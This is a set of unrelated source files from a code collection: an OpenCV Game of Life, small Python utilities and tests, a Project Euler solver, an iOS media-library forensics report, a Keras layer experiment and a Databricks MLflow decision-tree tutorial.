1)\r\n\r\n    source_frame = None\r\n    gol_frame = None\r\n    binary_frame = None\r\n    gol_kernel = cv.CreateMat(3, 3, cv.CV_8UC1)\r\n    for y in range(0, 3):\r\n        for x in range(0, 3):\r\n            gol_kernel[y, x] = 1\r\n    gol_kernel[1, 1] = 9\r\n\r\n    gol_lut = cv.CreateMat(256, 1, cv.CV_8UC1)\r\n    for c in range(0, 256):\r\n        gol_lut[c, 0] = 0\r\n\r\n    # Conway's classic rules implemented as a filter: the kernel scores each\r\n    # live neighbour 1 and the centre cell 9, so the filtered value is\r\n    # 9*alive + live_neighbours. Index 3 = dead cell with three neighbours\r\n    # (birth); 11 and 12 = live cell with two or three neighbours (survival).\r\n    gol_lut[ 3, 0] = 255\r\n    gol_lut[11, 0] = 255\r\n    gol_lut[12, 0] = 255\r\n\r\n    while True:\r\n        captured_frame = cv.QueryFrame(capture)\r\n        if captured_frame:\r\n            destWidth = 320\r\n            destHeight = 240\r\n#            destWidth = 1920\r\n#            destHeight = 1080\r\n            frame = cv.CreateMat(destHeight, destWidth, cv.CV_8UC3)\r\n            cv.Resize(captured_frame, frame, cv.CV_INTER_AREA)\r\n            cv.ShowImage(capture_window_name, frame)\r\n            binary_frame = cv.CreateImage(cv.GetSize(frame), cv.IPL_DEPTH_8U, 1)\r\n            cv.CvtColor(frame, binary_frame, cv.CV_RGB2GRAY)\r\n            image1 = cv.fromarray(numpy.ones((destHeight, destWidth, 1)))\r\n            cv.AdaptiveThreshold(binary_frame, binary_frame, 1)\r\n            cv.Sub(image1, binary_frame, binary_frame)\r\n            cv.Threshold(binary_frame, binary_frame, 0, 255, cv.CV_THRESH_BINARY)\r\n            cv.ShowImage(binary_window_name, binary_frame)\r\n\r\n            key = cv.WaitKey(1)\r\n            if key == 1048603 or key == 27:  # Escape?\r\n                break\r\n            elif key != -1:\r\n                frameNum = 0\r\n                cv.SaveImage('GameOfLifeFrame.png', frame)\r\n                cv.SaveImage('GameOfLifeBinaryFrame.png', binary_frame)\r\n                source_frame = binary_frame\r\n                cv.ShowImage(snap_window_name, source_frame)\r\n                gol_frame = source_frame\r\n\r\n            if gol_frame:\r\n                old_gol_frame = gol_frame\r\n                cv.Threshold(gol_frame, gol_frame, 0, 1, cv.CV_THRESH_BINARY)\r\n                cv.Filter2D(old_gol_frame, gol_frame, gol_kernel)\r\n                cv.LUT(gol_frame, gol_frame, gol_lut)\r\n#                cv.SaveImage('output/'+str(frameNum)+'.png', gol_frame)\r\n                frameNum += 1\r\n                cv.ShowImage(gol_window_name, gol_frame)\r\n\r\n    cv.DestroyWindow(capture_window_name)\r\n    
cv.DestroyWindow(binary_window_name)\r\n    cv.DestroyWindow(snap_window_name)\r\n    cv.DestroyWindow(gol_window_name)\r\n\r\nif __name__ == \"__main__\":\r\n    exit(game_of_life())","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"570868962","text":"import numpy as np\n\n\ndef query_next_top1(s, queried):\n    s_copy = np.array([-np.inf if i in queried else val for i, val in enumerate(s)])\n    u = np.argmax(s_copy)\n    return u\n\n\ndef sample(scores, size, inv=False, c=-0.99):\n    arr = np.arange(len(scores))\n    probs = 1. / np.array(scores) if inv else np.array(scores)\n\n    #ids = np.argsort(probs)[:len(probs) // 2]\n    #probs[ids] = 0\n\n    probs = probs / np.sum(probs)\n    if not inv: probs = (c * probs + 1) ** (1 / c)\n\n    probs = probs / np.sum(probs)\n    probs[probs < 0] = 0  # quick hack to avoid some decimal precision problems\n    probs = probs / np.sum(probs)\n\n    return np.random.choice(arr, size=size, replace=False, p=probs)\n\n\ndef sigmoid(a, b):\n    return 1 / (1 + np.exp(-(a - b)))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"600637685","text":"import unittest\nimport sys\n\nundertest = __import__(sys.argv[-1].split(\".py\")[0])\nuniao_listas = getattr(undertest, 'uniao_listas', None)\n\nclass PublicTests(unittest.TestCase):\n\n    def test_exemplo(self):\n        l1 = [2,1,3,4]\n        l2 = [2]\n        assert uniao_listas(l1,l2) == None\n        assert l1 == [2,1,3,4]\n        assert l2 == [2]\n\n        l1 = [1,3,4]\n        l2 = [4]\n        assert uniao_listas(l1,l2) == None\n        assert l1 == [1,3,4]\n        assert l2 == [4]\n\n        l1 = [2,4,1]\n        l2 = [6,7,91]\n        uniao_listas(l1,l2)\n        assert l1 == [2,4,1,6,7,91]\n        assert l2 == [6,7,91]\n    \n\nif __name__ == '__main__':\n    loader = unittest.TestLoader()\n    runner = unittest.TextTestRunner()\n    runner.run(loader.loadTestsFromModule(sys.modules[__name__]))\n","sub_path":"Unidade 8/uniao/public_tests.py","file_name":"public_tests.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"52447685","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\n\"\"\"\nIt was proposed by Christian Goldbach that every odd composite number can be\nwritten as the sum of a prime and twice a square.\n\n9 = 7 + 2×1^2\n15 = 7 + 2×2^2\n21 = 3 + 2×3^2\n25 = 7 + 2×3^2\n27 = 19 + 2×2^2\n33 = 31 + 2×1^2\n\nIt turns out that the conjecture was false.\n\nWhat is the smallest odd composite that cannot be written as the sum of a prime\nand twice a square?\n\"\"\"\n\n\nimport math\nimport sys\n\ndef is_prime(number):\n    \"\"\"\n    A slow prime checker function\n    \"\"\"\n\n    number = abs(number)\n\n    if number == 1:\n        return False\n\n    # For faster processing\n    # All primes except 2 are odd\n    if number % 2 == 0 and number != 2:\n        return False\n\n    if number % 3 == 0 and number != 3:\n        return False\n\n    # Only up to the square root\n    for n in range(2, math.trunc(math.sqrt(number)) + 1):\n        if number % n == 0:\n            return False\n\n    return True\n\nif __name__ == \"__main__\":\n\n    counter = 2\n    search = True\n    primes = set()\n\n    while search:\n\n        p = False\n        if is_prime(counter):\n            p = True\n            primes.add(counter)\n\n        if counter % 2 != 0 and p is False:\n            print(counter)\n            sys.stdout.flush()\n\n            check_composite = False\n\n            for prime in primes:\n                res = 1\n                while prime + (2 * 
math.pow(res, 2)) <= counter:\n\n if prime + (2 * math.pow(res, 2)) == counter:\n check_composite = True\n\n res += 1\n\n if check_composite is False:\n sys.exit()\n break\n\n\n counter += 1\n","sub_path":"id46.py","file_name":"id46.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286135692","text":"import glob\nimport os\nimport pathlib\nimport plistlib\nimport sqlite3\n\nfrom common import logfunc\nfrom contrib.utils import silence_and_log\nfrom settings import *\nfrom vendor import ccl_bplist\n\n\ndef medlib(filefound):\n try:\n db = sqlite3.connect(filefound[0])\n cursor = db.cursor()\n cursor.execute(\n \"\"\"\n\t\tselect\n\t\text.title AS \"Title\",\n\t\text.media_kind AS \"Media Type\",\n\t\titep.format AS \"File format\",\n\t\text.location AS \"File\",\n\t\text.total_time_ms AS \"Total time (ms)\",\n\t\text.file_size AS \"File size\",\n\t\text.year AS \"Year\",\n\t\talb.album AS \"Album Name\",\n\t\talba.album_artist AS \"Artist\", \n\t\tcom.composer AS \"Composer\", \n\t\tgen.genre AS \"Genre\",\n\t\tart.artwork_token AS \"Artwork\",\n\t\titev.extended_content_rating AS \"Content rating\",\n\t\titev.movie_info AS \"Movie information\",\n\t\text.description_long AS \"Description\",\n\t\tite.track_number AS \"Track number\",\n\t\tsto.account_id AS \"Account ID\",\n\t\tstrftime('%d/%m/%Y %H:%M:%S', datetime(sto.date_purchased + 978397200,'unixepoch'))date_purchased,\n\t\tsto.store_item_id AS \"Item ID\",\n\t\tsto.purchase_history_id AS \"Purchase History ID\",\n\t\text.copyright AS \"Copyright\"\n\t\tfrom\n\t\titem_extra ext\n\t\tjoin item_store sto using (item_pid)\n\t\tjoin item ite using (item_pid)\n\t\tjoin item_stats ites using (item_pid)\n\t\tjoin item_playback itep using (item_pid)\n\t\tjoin item_video itev using (item_pid)\n\t\tleft join album alb on sto.item_pid=alb.representative_item_pid\n\t\tleft join album_artist alba on sto.item_pid=alba.representative_item_pid\n\t\tleft join composer com on sto.item_pid=com.representative_item_pid\n\t\tleft join genre gen on sto.item_pid=gen.representative_item_pid\n\t\tleft join item_artist itea on sto.item_pid=itea.representative_item_pid\n\t\tleft join artwork_token art on sto.item_pid=art.entity_pid \n\t\t\"\"\"\n )\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n logfunc(f\"Media Library function executing\")\n os.makedirs(os.path.join(reportfolderbase, \"Media Library/\"))\n with open(\n os.path.join(reportfolderbase, \"Media Library/Media Library.html\"),\n \"w\",\n encoding=\"utf8\",\n ) as f:\n f.write(\"\")\n f.write(\"

<html><body><h2>Media Library report</h2>\")\n f.write(f\"Media Library entries: {usageentries}<br>\")\n f.write(f\"Media Library located at: {filefound[0]}<br>\")\n f.write(\n \"<style> table, th, td {border: 1px solid black; border-collapse: collapse;}</style>\"\n )\n f.write(\"<br><br>\")\n f.write(f'<table>')\n f.write(\n f\"<tr><th>Title</th><th>Media Type</th><th>File Format</th><th>File</th><th>Total Time (ms)</th><th>File Size</th><th>Year</th><th>Album Name</th><th>Artist</th><th>Composer</th><th>Genre</th><th>Artwork</th><th>Content Rating</th><th>Movie Information</th><th>Description</th><th>Track Number</th><th>Account ID</th><th>Date Purchased</th><th>Item ID</th><th>Purchase History ID</th><th>Copyright</th></tr>\"\n )\n for row in all_rows:\n f.write(\n f\"<tr><td>{row[0]}</td><td>{row[1]}</td><td>{row[2]}</td><td>{row[3]}</td><td>{row[4]}</td><td>{row[5]}</td><td>{row[6]}</td><td>{row[7]}</td><td>{row[8]}</td><td>{row[9]}</td><td>{row[10]}</td><td>{row[11]}</td><td>{row[12]}</td><td>{row[13]}</td><td>{row[14]}</td><td>{row[15]}</td><td>{row[16]}</td><td>{row[17]}</td><td>{row[18]}</td><td>{row[19]}</td><td>{row[20]}</td></tr>\"\n )\n f.write(f\"</table></body></html>
\")\n logfunc(f\"Media Library function completed\")\n else:\n logfunc(\"No Media Library available\")\n except:\n logfunc(\"Error in Media Library Section.\")\n","sub_path":"contrib/media_library/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"121981029","text":"import pygame\r\nfrom params import *\r\n\r\ndef Keyboard(key, mapParameters, carsParameters):\r\n pressingArray = pygame.key.get_pressed()\r\n # print(pressingArray[KEY_D])\r\n pos = mapParameters[1]\r\n if key == pygame.K_z:\r\n mapParameters[0] = 2\r\n elif key == pygame.K_x:\r\n mapParameters[0] = 1\r\n mapParameters[1] = (0,0)\r\n\r\n if key == pygame.K_F1:\r\n mapParameters[2] = True\r\n\r\n if (key == pygame.K_d or pressingArray[KEY_D]) and mapParameters[0] == 2 :\r\n mapParameters[1] = limitPosition(pos, (-100, 0))\r\n elif (key == pygame.K_a or pressingArray[KEY_A]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (100, 0))\r\n\r\n if (key == pygame.K_w or pressingArray[KEY_W]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (0, 100))\r\n elif (key == pygame.K_s or pressingArray[KEY_S]) and mapParameters[0] == 2:\r\n mapParameters[1] = limitPosition(pos, (0, -100))\r\n\r\n if key == pygame.K_UP or pressingArray[KEY_UP]:\r\n carsParameters.append(\"up\")\r\n elif key == pygame.K_DOWN or pressingArray[KEY_DOWN]:\r\n carsParameters.append(\"down\")\r\n\r\n if key == pygame.K_LEFT or pressingArray[KEY_LEFT]:\r\n carsParameters.append(\"left\")\r\n elif key == pygame.K_RIGHT or pressingArray[KEY_RIGHT]:\r\n carsParameters.append(\"right\")\r\n \r\n # print(pressingArray[KEY_UP])\r\n\r\n\r\n \r\n return mapParameters, carsParameters\r\n\r\n\r\ndef limitPosition(pos, increse):\r\n position = [pos[0], pos[1]] \r\n if pos[0] + increse[0] < -SCREEN_WIDTH:\r\n position[0] = -SCREEN_WIDTH\r\n elif pos[0] + increse[0] > 0:\r\n position[0] = 0\r\n else:\r\n position[0] = pos[0] + increse[0]\r\n\r\n if pos[1] + increse[1] < -SCREEN_HEIGHT:\r\n position[1] = -SCREEN_HEIGHT\r\n elif pos[1] + increse[1] > 0:\r\n position[1] = 0\r\n else:\r\n position[1] = pos[1] + increse[1]\r\n return tuple(position)","sub_path":"Simulation/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481344208","text":"import jellyfish\n\ndef _sign(number:float)->int:\n if(number >= 0):\n return 1\n return -1\n\ndef _inverse_direction(direction:str)->str:\n if(direction == 'UP'):\n return 'DOWN'\n elif(direction == 'DOWN'):\n return 'UP'\n \ndef _match_direction(i:int, s:str)->bool:\n return ((i == 1 and s == 'UP') or (i==-1 and s == 'DOWN'))\n\ndef _similar(a:str, b:str, trace = False)->float:\n ''' Reports the similarity ratio between two strings. 
'''\n return jellyfish.jaro_winkler(a, b)\n\n\ndef _union(a:list, b:list)->list:\n return list(set(a)|set(b))\n\ndef _difference(a:list, b:list)->list:\n return list(set(a)-set(b))\n\ndef _print_list_vertically(a:list)->None:\n a = str(a)\n length = len(a)\n i = 0\n while i < length:\n if(i+125 < length):\n print(a[i:i+125])\n else:\n print(a[i:length])\n i += 125\n \ndef _write_out_2D_list_vertically(a:list, filename:str):\n i = 0\n f = open(filename, 'w')\n for sub_a in a:\n f.write(str(i))\n f.write('\\n')\n \n sub_a = str(sub_a)\n length = len(sub_a)\n j = 0\n while j < length:\n if(j+125 < length):\n f.write(sub_a[j:j+125])\n else:\n f.write(sub_a[j:length])\n j += 125\n f.write('\\n')\n \n f.write('\\n')\n i = i + 1\n f.close()\n \ndef _write_out_1D_list_vertically(a:list, filename:str):\n f = open(filename, 'w')\n a = str(a)\n length = len(a)\n j = 0\n while j < length:\n if(j+125 < length):\n f.write(a[j:j+125])\n else:\n f.write(a[j:length])\n j += 125\n f.write('\\n')\n f.close()\n \n# OUTPUT FUNCTIONS\ndef _write_out_substates(unions:list, differences:list, intersections:list, fuzzy_intersections:list):\n _write_out_2D_list_vertically(unions, 'all_unions.txt')\n _write_out_2D_list_vertically(differences, 'all_differences.txt')\n _write_out_2D_list_vertically(intersections, 'all_intersections.txt')\n _write_out_2D_list_vertically(fuzzy_intersections, 'all_fuzzy_intersections.txt') \n \ndef _output_intersection(intersection:list, intersection_filename:str)->None:\n _write_out_1D_list_vertically(intersection, intersection_filename)\n \ndef _output_fuzzy_intersection(fuzzy_intersection:list, fuzzy_intersection_filename:str)->None:\n _write_out_1D_list_vertically(fuzzy_intersection, fuzzy_intersection_filename)\n \ndef _output_union(union:list, union_filename:str)->None:\n _write_out_1D_list_vertically(union, union_filename)\n \n \n ","sub_path":"A_Lister_Shared_Functionality.py","file_name":"A_Lister_Shared_Functionality.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548448939","text":"## JSON PART\n\nimport os\nimport json\n\n\nclass Pelicula():\n\n def __init__(self, nombre, director, duracion, puntuacion):\n self.nombre = nombre\n self.director = director\n self.duracion = duracion\n self.puntuacion = puntuacion\n\n def __repr__(self):\n return (f'| {self.nombre:48s} | {self.director:22s} '\n f'| {self.duracion:16s} | {self.puntuacion:16s} |')\n\n \ndef desencriptar(string):\n simbolos = list(\"|¡!#$%&/+-(=)*];\")\n letras_1 = list(\"aeiousrdmn12345-\")\n letras_2 = list(\"ndsrtoaeiu67890-\")\n\n string_encriptado = list(string)\n largo = len(string_encriptado)\n\n for posicion in range(largo):\n if string_encriptado[posicion] in simbolos:\n simbolo = string_encriptado.pop(posicion)\n if largo % 2 == 0:\n string_encriptado.insert(posicion, letras_1[simbolos.index(simbolo)])\n else:\n string_encriptado.insert(posicion, letras_2[simbolos.index(simbolo)])\n\n string_desencriptado = \"\".join(string_encriptado)\n return string_desencriptado\n\n\ndef cargar_peliculas(ruta):\n with open(ruta, \"rb\") as file:\n data = json.load(file, object_hook=desencriptado)\n return data\n\ndef desencriptado(diccionario):\n diccionario_vacio = {}\n diccionario_copy = diccionario.copy()\n for pelicula in diccionario_copy:\n pelicula_nueva = desencriptar(pelicula)\n director_nuevo = desencriptar(diccionario_copy[pelicula][1])\n duracion_nueva = desencriptar(diccionario_copy[pelicula][2])\n 
puntuacion_nueva = desencriptar(diccionario_copy[pelicula][3])\n diccionario_vacio[pelicula_nueva] = [diccionario_copy[pelicula][0], director_nuevo, duracion_nueva, puntuacion_nueva]\n # print(diccionario_vacio)\n return diccionario_vacio\n\nif __name__ == \"__main__\":\n \n print(f' {\"-\" * 113} ')\n print(f'| {\"NOMBRE\":48s} | {\"DIRECTOR\":22s} | {\"DURACION\":16s} | {\"PUNTUACION\":16s} |')\n print(f' {\"-\" * 113} ')\n\n for nombre_pelicula, datos in cargar_peliculas(\"peliculas.json\").items():\n pelicula = Pelicula(nombre_pelicula, datos[1], datos[2], datos[3])\n print(pelicula)\n\n print(f' {\"-\" * 113} ')","sub_path":"Actividades/AS04/Actividad Json/peliculas.py","file_name":"peliculas.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231581780","text":"from ...command import SubCommand\nfrom ...tools import get_moya_dir\nfrom ... import build\n\nfrom fs.path import join\nfrom fs.opener import fsopendir\nfrom fs.tempfs import TempFS\n\nimport sys\nimport os.path\n\n\nclass Doc(SubCommand):\n \"\"\"Moya documentation\"\"\"\n help = \"\"\"automatically generate Moya documentation\"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument(dest=\"action\", metavar=\"EXTRACT or BUILD\",\n help=\"Documentation action\")\n\n parser.add_argument(dest=\"location\", default=None, metavar=\"PATH\",\n help=\"location of library (directory containing lib.ini) or a python import if preceded by 'py:', e.g. py:moya.libs.auth\")\n\n parser.add_argument('-b', '--lib', dest=\"lib\", metavar=\"LONG.NAME\", default=None,\n help=\"library to generate docs for\")\n parser.add_argument('-n', '--xmlns', dest=\"namespaces\", metavar=\"XML NAMESPACE\", action=\"append\",\n help=\"Namespace to generate docs for\")\n parser.add_argument('-e', '--extract', dest=\"extract\", metavar=\"PATH\", default=None,\n help=\"path to save raw documentation information\")\n parser.add_argument('-o', '--output', dest=\"output\", metavar=\"PATH\", default=None,\n help=\"path for documentation output, defaults to ./documentation in project root\")\n parser.add_argument('-t', '--theme', dest='theme', metavar=\"PATH\", default=None,\n help=\"path to theme files (templates)\")\n parser.add_argument('-s', '--source', dest=\"source\", metavar=\"SOURCE\", default=None,\n help=\"path to extracted docs\")\n\n return parser\n\n def get_fs(self, path):\n if path is None:\n path = join(get_moya_dir(), './documentation')\n fs = fsopendir(path, create_dir=True)\n return fs\n\n def run(self):\n args = self.args\n\n archive, lib = build.build_lib(args.location)\n archive.finalize()\n\n action = args.action.lower()\n if action == 'extract':\n print(\"Extracting {}...\".format(lib.long_name))\n self.extract(archive, lib.long_name)\n\n elif action == 'build':\n print(\"Building {}...\".format(lib.long_name))\n if args.source is not None:\n extract_fs = fsopendir(args.source)\n else:\n extract_fs = self.extract(archive, lib.long_name)\n return self.build(archive, extract_fs)\n\n else:\n sys.stdout.write('action should be EXTRACT or BUILD\\n')\n return -1\n\n def extract(self, archive, lib_name):\n args = self.args\n namespaces = args.namespaces\n if not namespaces:\n namespaces = list(archive.known_namespaces)\n\n from ...docgen.extracter import Extracter\n\n if args.extract is None:\n extract_fs = TempFS('moyadoc-{}'.format(lib_name))\n else:\n extract_fs = self.get_fs(join(args.extract, lib_name))\n extracter = Extracter(archive, 
extract_fs)\n extracter.extract_lib(lib_name)\n return extract_fs\n\n def build(self, archive, source_fs):\n args = self.args\n output_fs = self.get_fs(args.output)\n\n out_path = output_fs.desc('/')\n\n # if not output_fs.isdirempty('/'):\n # if raw_input('{} is not empty. Overwrite? (Y/N) '.format(out_path)).lower() not in ('y', 'yes'):\n # sys.stdout.write('aborted\\n')\n # return -1\n\n if args.theme is None:\n from ... import docgen\n theme_path = os.path.join(os.path.dirname(docgen.__file__), 'themes/default')\n else:\n theme_path = args.theme\n theme_fs = self.get_fs(theme_path)\n\n from ...docgen.builder import Builder\n builder = Builder(source_fs, output_fs, theme_fs)\n builder.build()\n","sub_path":"moya/command/sub/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"209262190","text":"\n# tensorflow ==1.7\nimport os\nimport socket\nmachine_name = socket.gethostname()\nif machine_name == \"lulin-QX-350-Series\":\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nelse:\n\tos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\n\timport matplotlib as mpl \n\tmpl.use(\"Agg\")\n\t# Qt_XKB_CONFIG_ROOT (add path ?)\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n# from U_net import UNet\n# from generator import my_generator\nfrom keras import backend as K\nimport keras\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\n\nimport tensorflow as tf\nimport keras.backend.tensorflow_backend as KTF\nimport dill\n\n\n\nfrom keras.models import Input, Model, Sequential\nfrom keras.layers import Conv2D, Concatenate, MaxPooling2D, Conv2DTranspose, concatenate, Dense\nfrom keras.layers import UpSampling2D, Dropout, BatchNormalization, Flatten, Dense\nfrom MyLayer import Bias_Lu, Bias_Lu2\n\ndef get_session(gpu_fraction=0.5):\n\t'''Assume that you have 6GB of GPU memory and want to allocate ~2GB'''\n\n\tnum_threads = os.environ.get('OMP_NUM_THREADS')\n\tgpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)\n\n\tif num_threads:\n\t\treturn tf.Session(config=tf.ConfigProto(\n\t\t\tgpu_options=gpu_options, intra_op_parallelism_threads=num_threads))\n\telse:\n\t\treturn tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\nif machine_name == \"lulin-QX-350-Series\":\n\tKTF.set_session(get_session(gpu_fraction=0.4)) # NEW 28-9-2017\nelse:\n\tKTF.set_session(get_session(gpu_fraction=0.9)) # NEW 28-9-2017\n\n\n\n\nif __name__ == \"__main__\":\n\tprint(\"Start\")\n\n\t# input_shape=(3, 32, 32)\n\t# A = np.random.random((5, 28, 28,1))\n\tdef model1():\n\t\tentree = Input(shape=(28,28,1))\n\t\tlayer1 = Conv2D(16, 3, activation='relu', padding='same', use_bias=False)(entree)\n\t\tlayer2 = Flatten()(layer1)\n\t\tsortie = Bias_Lu(28*28*16, name='Custom_bias_layer')(layer2)\n\t\tlayer3 = Dense(10, name='dense3', activation='softmax')\n\t\tsortie = layer3(sortie)\n\t\tmodel = Model(inputs=entree, outputs = sortie)\n\t\tmodel.compile(optimizer='sgd', \n\t\t\tloss=keras.losses.categorical_crossentropy, \n\t\t\tmetrics=['accuracy'])\n\n\t\tmodel.summary()\n\t\treturn model\n\n\tdef model2():\n\t\tentree = Input(shape=(28,28,1))\n\t\tlayer1 = Conv2D(16, 3, activation='relu', padding='same', use_bias=False)(entree)\n\t\tsortie = Bias_Lu2((28,28,16,), name='Custom_bias_layer')(layer1)\n\n\t\tsortie = Flatten()(sortie)\n\t\tlayer3 = Dense(10, name='dense3', activation='softmax')\n\t\tsortie = layer3(sortie)\n\t\tmodel = 
Model(inputs=entree, outputs = sortie)\n\t\tmodel.compile(optimizer='sgd', \n\t\t\tloss=keras.losses.categorical_crossentropy, \n\t\t\tmetrics=['accuracy'])\n\n\t\tmodel.summary()\n\t\treturn model\n\n\tX_train = np.random.random((10, 28,28,1))\n\ty_train = np.arange(10)\n\ty_train = keras.utils.to_categorical(y_train, 10)\n\t\n\n\ttensorboard = keras.callbacks.TensorBoard(log_dir='./logs_custom', histogram_freq=0, write_graph=True, write_images=True, write_grads=False)\n\n\n\t\n\n\tmodel = model2()\n\tprint(\"=\"*50)\n\tprint(\"Nomber of trainable weights: {}\".format(len(model.get_layer(\"Custom_bias_layer\").trainable_weights)))\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0].shape)\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0])\n\t\n\n\tmodel.fit(X_train, y_train, epochs=20, shuffle=True, batch_size= 10, callbacks=[tensorboard])\n\n\t# self.bias = self.add_weight(shape=(self.filters,),\n\t# \t\t\t\t\t\t\tinitializer=self.bias_initializer,\n\t# \t\t\t\t\t\t\tname='bias',\n\t# \t\t\t\t\t\t\tregularizer=self.bias_regularizer,\n\t# \t\t\t\t\t\t\tconstraint=self.bias_constraint)\n\tprint(model.get_layer(\"Custom_bias_layer\").get_weights()[0])","sub_path":"spatial_cnn.py","file_name":"spatial_cnn.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477900742","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC [Databricks blog post](https://docs.microsoft.com/en-us/azure/databricks/applications/machine-learning/automl/mllib-mlflow-integration)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # MLlib + Automated MLflow Tracking\n# MAGIC \n# MAGIC This notebook demonstrates how to use automated MLflow tracking to track MLlib model tuning. \n# MAGIC \n# MAGIC It demonstrates learning a [decision tree](https://en.wikipedia.org/wiki/Decision_tree_learning) using the Apache Spark distributed implementation. Tracking the learning process in MLflow gives a better understanding of some critical [hyperparameters](https://en.wikipedia.org/wiki/Hyperparameter_optimization) for the tree learning algorithm, using examples to demonstrate how tuning the hyperparameters can improve accuracy.\n# MAGIC \n# MAGIC **Data**: The classic MNIST handwritten digit recognition dataset.\n# MAGIC \n# MAGIC **Goal**: Learn how to recognize digits (0 - 9) from images of handwriting.\n# MAGIC \n# MAGIC **Takeaways**: Decision trees take several hyperparameters that can affect the accuracy of the learned model. There is no one \"best\" setting for these for all datasets. To get the optimal accuracy, you need to tune these hyperparameters based on your data.\n\n# COMMAND ----------\n\n# MAGIC %md ## Load MNIST training and test datasets\n# MAGIC \n# MAGIC The datasets are vectors of pixels representing images of handwritten digits.\n# MAGIC \n# MAGIC These datasets are stored in the popular LibSVM dataset format. Load them using MLlib's LibSVM dataset reader utility.\n\n# COMMAND ----------\n\ntraining = spark.read.format(\"libsvm\").option(\"numFeatures\", \"784\").load(\"/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt\")\ntest = spark.read.format(\"libsvm\").option(\"numFeatures\", \"784\").load(\"/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt\")\n\ntraining.cache()\ntest.cache()\n\nprint(\"There are {} training images and {} test images.\".format(training.count(), test.count()))\n\n# COMMAND ----------\n\n# MAGIC %md Display the data. 
Each image has the true label (the `label` column) and a vector of `features` that represent pixel intensities.\n\n# COMMAND ----------\n\ndisplay(training)\n\n# COMMAND ----------\n\n# MAGIC %md ## Define an ML Pipeline with a Decision Tree Estimator\n# MAGIC \n# MAGIC Before training, use the `StringIndexer` class to convert the labels to the categories 0-9, rather than continuous values. Tie this feature preprocessing together with the tree algorithm using a `Pipeline`. Pipelines are objects Apache Spark provides for piecing together machine learning algorithms into workflows. To learn more about Pipelines, check out other ML example notebooks in Databricks and the [ML Pipelines user guide](http://spark.apache.org/docs/latest/ml-guide.html).\n\n# COMMAND ----------\n\n# Import the ML classification, indexer, and pipeline classes \nfrom pyspark.ml.classification import DecisionTreeClassifier, DecisionTreeClassificationModel\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml import Pipeline\n\n# COMMAND ----------\n\n# StringIndexer: Read input column \"label\" (digits) and annotate them as categorical values.\nindexer = StringIndexer(inputCol=\"label\", outputCol=\"indexedLabel\")\n# DecisionTreeClassifier: Learn to predict column \"indexedLabel\" using the \"features\" column.\ndtc = DecisionTreeClassifier(labelCol=\"indexedLabel\")\n# Chain indexer + dtc together into a single ML Pipeline.\npipeline = Pipeline(stages=[indexer, dtc])\n\n# COMMAND ----------\n\n# MAGIC %md ## Automated MLflow Tracking for CrossValidator model tuning\n# MAGIC \n# MAGIC This section tunes some of the Pipeline's hyperparameters. While tuning, MLflow automatically tracks the models produced by `CrossValidator`, along with their evaluation metrics. This allows you to examine the behavior of the following tuning hyperparameters using MLflow:\n# MAGIC \n# MAGIC * `maxDepth`, which determines how deep (and large) the tree can be. Train trees at varying depths and see how it affects the accuracy on your held-out test set.\n# MAGIC * `maxBins`, which controls how to discretize (bin) continuous features. This case bins pixel values; e.g., choosing `maxBins=2` effectively turns your images into black-and-white images.\n\n# COMMAND ----------\n\n# Define an evaluation metric. In this case, use \"weightedPrecision\", which is equivalent to 0-1 accuracy.\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\nevaluator = MulticlassClassificationEvaluator(labelCol=\"indexedLabel\", metricName=\"weightedPrecision\")\n\n# COMMAND ----------\n\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\n\n# COMMAND ----------\n\ngrid = ParamGridBuilder() \\\n .addGrid(dtc.maxDepth, [2, 3, 4, 5, 6, 7, 8]) \\\n .addGrid(dtc.maxBins, [2, 4, 8]) \\\n .build()\n\n# COMMAND ----------\n\ncv = CrossValidator(estimator=pipeline, evaluator=evaluator, estimatorParamMaps=grid, 